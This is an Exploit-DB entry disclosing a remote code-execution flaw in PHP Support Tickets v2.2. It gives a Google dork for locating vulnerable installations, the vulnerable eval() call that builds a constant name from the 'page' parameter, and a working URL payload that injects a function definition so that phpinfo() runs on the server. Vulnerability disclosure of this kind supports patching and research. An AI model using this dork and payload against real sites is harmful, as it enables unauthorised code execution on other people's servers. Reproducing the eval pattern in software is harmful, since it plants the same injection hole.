PHP Support Tickets 2.2 - Code Execution

EDB-ID:

17822

CVE:

EDB Verified:

Author:

brain[pillow]

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-09-12

Vulnerable App:

# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2

====================================================================
# Vuln. code:

/classes/GUI/abstract.GUI.php 

    public function getPageName() { 
        return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';'); 
    } 

====================================================================
# Exploit:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services